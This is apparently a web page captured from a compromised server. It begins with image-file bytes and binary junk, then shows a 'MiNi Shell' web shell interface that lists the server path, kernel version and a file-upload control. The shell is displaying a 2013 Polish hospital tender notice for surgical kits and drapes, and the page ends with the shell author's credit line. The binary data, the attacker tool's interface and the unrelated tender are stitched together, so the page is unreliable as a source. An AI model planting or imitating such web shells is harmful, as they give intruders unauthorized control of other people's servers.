JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130107/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130107/3303-N-2013.html

<p class="kh_header"><b>Toruń: Dostawa zestawów zabiegowych i serwet operacyjnych</b><br>
<b>Numer ogłoszenia: 3303 - 2013; data zamieszczenia: 07.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Zespolony im. L. Rydygiera , ul. Św. Józefa 53-59, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 6101510, faks 56 6596128.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wszz.torun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa zestawów zabiegowych i serwet operacyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa zestawów zabiegowych i serwet operacyjnych <br>

1.Zestaw do założenia szwów -5000 szt. <br>

Skład:<br>

-plastikowe kleszczyki Kocher 14 cm - 1 szt.<br>

-metalowa pęseta Adson 12 cm - 1 szt.<br>

-tupfery (kuliste), 100% bawełniana gaza higroskopijna, 20 nitkowa, około 20cm x 20 cm, przed zwinięciem - 6 szt.<br>

-metalowy igłotrzymacz 12 cm - 1 szt.<br>

-metalowe nożyczki ostre/ostre 11 cm - 1 szt. <br>

-serweta z włókniny 50 cm x 50 cm z przylepnym otworem 10 cm x 5 cm; podwójna włóknina (celuloza i polietylen) 50g/m2   - 1 szt. <br>
    
-nieprzylepna serweta z włókniny 60 cm x 60 cm; 
  podwójna włóknina (celuloza i polietylen) 50g/m2- 1 szt.   <br>
  
-igła podskórna, 21 G 1 1/2 (0,8 x 40 mm) (zapakowana) - 1 szt.<br>
     
-igła podskórna, 18 G 1 1/2 (1,2 x 40 mm) (zapakowana) - 1 szt.  <br>
   
-strzykawka Luer Lock 10 ml (zapakowana) - 1 szt.  <br>
   
Opakowanie - tacka typu blister<br>

2.Zestaw do usunięcia szwów - 1500 szt.<br>

Skład:<br>

-ostrze - skalpel 6,5 cm - stal węglowa - zakrzywione ostrze, bez rączki (zapakowany) - 1 szt.    <br>
 
-tupfery (kuliste) z włókniny (poliester/ wiskoza) - 30 gr/m2 (około 19 x 20 cm) - 3 szt.     <br>

-metalowa pęseta Adson 12 cm- 1 szt. <br>
    
-plastikowa pęseta 12,5 cm- 1 szt.    <br>
 
Opakowanie - tacka blister o pojemności ok 300 m<br>

3.Zestaw do cewnikowania pęcherza moczowego - 1500 szt.<br>

Skład:<br>

-tupfery (kuliste) , 100 % bawełniana gaza higroskopijna, 20 nitkowa (około 20 x 20 cm kiedy rozwinięta) - 4 szt.   <br>
  
-żel nawilżający 2,7 g, niemineralny, obojetny, nietłusty, hydrofilny praz płynny- 1 szt.    <br>
 
-ampułka ze sterylną wodą 20 ml, łatwa do otwarcia ampułka, laskie dno, przeznaczona do napełniania balonika cewnika urologicznego- 1 szt.  <br>
   
-igła podskórna 18 G 1 1/2 (1,2 x 40 mm) - zapakowana- 1 szt. <br>
    
-kompresy gazowe, 7,5 cm x 7,5 cm; 8 warstw, 17 nitek- 5 szt. <br>
    
-serweta z włókniny 75 cm x 90 cm z centralnym otworem 10 cm; włóknina ( polipropylen i polietylen 55g/m2) - 1 szt.   <br>
  
-serweta z włókniny 45 cm x 75 cm; włóknina 
( polipropylen i polietylen 55g/m2) - owinięcie- 1 szt. <br>
    
-strzykawka Luer 20 ml (zapakowana) - 1 szt.  <br>
   
-plastikowe kleszczyki Kocher 14 cm- 1 szt.   <br>
  
-plastikowa pęseta do opatrunków 12,5 cm- 1 szt. <br>
    
-para leteksowych rękawic diagnostycznych, bezpudrowe, rozmiar M - zapakowane, z wywiniętym mankietem- 1 szt. <br>
   
Opakowanie - tacka blister o przybliżonej pojemności 750 ml<br>

4.Zestaw do wkłucia centralnego - 1000 szt.<br>

Skład:<br>

-tupfery gazowe, 20 nitkowa (około 20 x 20 cm)- 4 szt. <br>
    
-plastikowe kleszczyki Kocher 14 cm- 1 szt.   <br>
  
-plastikowa pęseta 12,5 cm- 1 szt.  <br>
   
-strzykawka Luer Lock 10 ml, strzykawka trzyczęściowa Luer Lock - trzon strzykawki i tłok; polipropylen - złącze; guma synettyczna, bezlaeksowa - w niepiroennym opakowaniu - sterylizacja tlenkiem etylenu, do płynów, ma być łączona ze wszystkimi typami igieł- 1 szt.   <br>
  
-igła podskórna 21G 1 1/2 (0,8 x 40 mm) w niepirogennym opakowaniu- 1 szt.  <br>
   
-ostrze - skalpel 6,5 cm, zakrzywiony, zapakowany- 1 szt. <br>
    
-samoprzylepny, przezroczysty opatrunek 10 cm x 15 cm w woreczku ze zrywaną warstwą papierową, sterylizacja tlenkiem etylenu- 1 szt.  <br>
   
-kompresy gazowe, 7,5 cm x 7,5 cm, 8 warstw, 17 nitek- 6 szt. <br>
    
-metalowy igłotrzymacz, 13 cm-1 szt.   <br>
  
-serweta z włókniny 45 cm x 75 cm; podwójna włóknina ( polipropylen i polietylen ) - 55g/m2 - 1 szt.   <br>
  
-serweta z włókniny 45 cm x 75 cm; z otworem ( regulacja otworu przylepnego - 2 części) podwójna włóknina ( polipropylen i polietylen ) - 55g/m2 - 1 szt.  <br>
    
-igła podskórna, 18 G 1 1/2 (1,2 x 40mm) 1 szt.   <br>
   
Opakowanie - typu blister z 2 wgłębieniami <br>

5.Zestaw do drenażu opłucnej - 1200 szt.: <br>

-serweta na stół narzędziowy 90 x 75 cm (owinięcie zestawu) - 1 szt. <br>

-serweta dwuwarstwowa przylepna, 2- częściowa 75 x 90 cm - 1 szt. <br>

-strzykawka Luer 20 cm - 1 szt. <br>

-igła injekcyjna 0,80 x 50 mm - 1 szt. <br>

-skalpel jednorazowy Nr 10 - 1 szt. <br>

-opatrunek chłonny z warstwą klejącą i.v. 8 x 6 cm - 1 szt. <br>

-kompres z gazy z nitką RTG 10 x 10 cm, 8 warstw, 17 nitek - 15 szt. <br>

-pojemnik plastikowy 60 ml (5 x 5 cm) z podziałką, okrągły - 1 szt. <br>

-pojemnik plastikowy 150 ml (9,2 x 2,96 cm) z podziałką; okrągły - 1 szt. <br>

-kleszczyki metalowe jednorazowe anatomiczne proste Pean 20 cm - 1 szt. <br>

-kleszczyki metalowe jednorazowe anatomiczne zagięte Halstead - Mosquito 12,5 cm - 1 szt. <br>

-imadło metalowe jednorazowe chirurgiczne Mayo-Hegar 14 cm - 1 szt. <br>

-pęseta chirurgiczna metalowa jednorazowa standardowa prosta 14 cm - 1 szt. <br>

-nożyczki chirurgiczne metalowe jednorazowe proste, ostro tępe 14, 5 cm - 1 szt. <br>

-kleszczyki plastikowe do mycia pola operacyjnego 14 cm - 1 szt. <br>

6.Zestaw do zmiany opatrunku - 14000 szt. <br>

Skład: <br>

-kleszcze plastikowe Kocher 14 cm - 1 szt. <br>

-pęseta plastikowa 12,5 cm - 1 szt. <br>

-kompresy z gazy bawełnianej 7,5 cm x 7,5 cm - 8 szt. <br>

-tampony (tupfery) z gazy bawełnianej, około 20 x 20cm przed zwinięciem  - 5 szt. <br>

-serweta włókninowa nieprzylepna 38 cm x 45 cm- 1 szt. <br>

Opakowanie typu blister z 3 wgłębieniami na płyny <br>

7.Zestaw do zmiany opatrunku - 3000 szt. <br>

Skład : <br>

-pęseta plastikowa 12,5cm - 2szt. <br>

-tampony ( tupfery )włókninowe około 19 x 20cm , przed zwinięciem - 6 szt. <br>

Opakowanie typu blister z 3 wgłębieniami na płyny <br>

8.Zestaw do usunięcia szwów - 6000 szt. <br>

-skalpel kosa z nasadką rozmiar 12- 1 szt. <br>

-tupfer gazowy 20 nitkowy (20 x 20 cm przed zwinięciem)-  3 szt. <br>

-pęseta metalowa  Adson 12 cm - 1 szt.  <br>

-pęseta plastik zielona 12,5 cm- 1 szt. <br>

-miska kwadratowa 325 ml - 1 szt. <br>

-owiniecie zestawu: papier krepowy <br>

9.Zestaw do szycia - 2500 szt.  <br>

-serweta dwuwarstwowa pełnobarierowa 50 x 50 cm- 1 szt. <br>

-imadło metalowe 12cm- 1 szt. <br>

-pęseta  metalowa chirurgiczna typu Adson 12 cm - 1 szt. <br>

-nożyczki ostro - ostre proste 13 cm - 1 szt.  <br>

-skalpel  z nasadką nr 12 (kosa)- 1 szt. <br>

-owinięcie zestawu : papier krepowy <br>

10.Śliniak ochronny jednorazowego użytku - 10000 szt.:  <br>

Samoprzylepny śliniak z warstwą folii posiadający kieszonkę, paski samoprzylepne umożliwiające stabilne zamocowanie z zaokrągleniem pod szyją. 
Rozmiar 38x65cm ? 2 cm <br>

11.Zestaw do dezynfekcji - 500szt. <br>

Skład :  <br>

-kleszcze plastikowe 14cm - 1szt. <br>

-tampony włókninowe ( tupfery ) w kształcie kuli , około 30 x 20cm przed 
zwinięciem - 6 szt. <br>

Opakowanie typu blister z 3 wgłębieniami na płyny  <br>

12.Zestaw do dezynfekcji - 500szt. <br>

Skład :  <br>

-tampony włókninowe ( tupfery ) w kształcie kuli około 30 x 20cm przed 
zwinięciem  - 5 szt. <br>

-kleszcze plastikowe 24cm - 1 szt. <br>

-transparentna miseczka plastikowa 150ml - 1szt. <br>

Opakowanie typu blister z 1 wgłębieniem na płyny <br>
 
13.Serweta operacyjna, jałowa, pełnobarierowa, trójwarstwowa, nieprzylepna w rozmiarze 90 x 75cm, pakowana w rękaw papierowo - foliowy , gramatura włókniny min. 72g/m2 - 2000 szt. <br>

14.Serweta operacyjna jałowa, pełnobarierowa, dwuwarstwowa, nieprzylepna w rozmiarze 50 x 50cm , pakowana w rękaw papierowo - foliowy , gramatura włókniny min. 53g/m2 - 2000 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.20-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie posiadania uprawnień do wykonywania określonej działalności Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykaz wykonanych min. 2 dostaw wyrobów  medycznych o wartości min. 99.000,00zł brutto każda dostawa w okresie ostatnich trzech lat przed dniem wszczęcia niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia min. 2 dokumentów potwierdzających, że te dostawy zostały wykonane należycie;

Jeżeli Wykonawca wykazując spełnianie tego warunku polegać będzie na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda przedstawienia w odniesieniu do tych podmiotów dokumentów stwierdzających, że do tych podmiotów nie zachodzą okoliczności wskazane w art. 24 ust. 1 pkt 2 ustawy - Pzp.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania odpowiednim potencjałem technicznym Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełniania warunku dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający nie określa szczegółowego warunku udziału.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym Wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy do min. kwoty 82.500,00zł brutto wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
         / Informacja banku mówiąca tylko o obrotach na rachunku Wykonawcy nie spełni warunku         udziału/.
      Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2 b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

      Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez Zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a/prospekty/ katalogi oferowanego przedmiotu zamówienia potwierdzające spełnianie parametrów wymaganych przez Zamawiającego.

Zamawiający zastrzega sobie możliwość wezwania Wykonawcy do przedłożenia próbek oferowanego asortymentu po upływie terminu otwarcia ofert.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a/	oświadczenia o braku podstaw do wykluczenia zgodnie z załącznikiem Nr 5 do SIWZ;
b/oświadczenia o spełnianiu warunków udziału zgodnie z załącznikiem Nr 6 do SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość aneksowania terminu obowiązywania umowy w przypadku niezrealizowania jej pod względem ilościowym w obowiązującym terminie umownym.
2. Ceny podane w ofercie będą obowiązywać przez okres trwania umowy, a w przypadku zmiany obowiązującej stawki podatku VAT w okresie trwania umowy Wykonawca ma prawo doliczyć do cen netto ustalonych w umowie należny podatek VAT według obowiązującej stawki. Zmiana ta nie będzie wymagała aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wszz.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych i Zaopatrzenia
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53-59, 87- 100 Toruń.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.01.2013 godzina 09:00, miejsce: Kancelaria
Wojewódzkiego Szpitala Zespolonego im. Ludwika Rydygiera
ul. Św. Józefa 53-59, 87-100 Toruń.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> *Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
**Zobowiązania podmiotu trzeciego z art. 26 ust. 2b ustawy - Prawo zamówień publicznych należy złożyć w oryginale.
***Jeżeli Wykonawcy składają ofertę wspólną ( konsorcjum, spółka cywilna) wówczas
oświadczenia i dokumenty dotyczące braku wykluczenia z postępowania muszą złożyć
wszyscy Wykonawcy wchodzący w skład konsorcjum czy tworzący spółkę cywilną.
****Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie i według formuły: spełnia/nie spełnia. Zamawiający na podstawie złożonych wraz z ofertą dokumentów będzie badał czy dokumenty te potwierdzają wymóg spełnienia określonych przez Zamawiającego warunków udziału.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com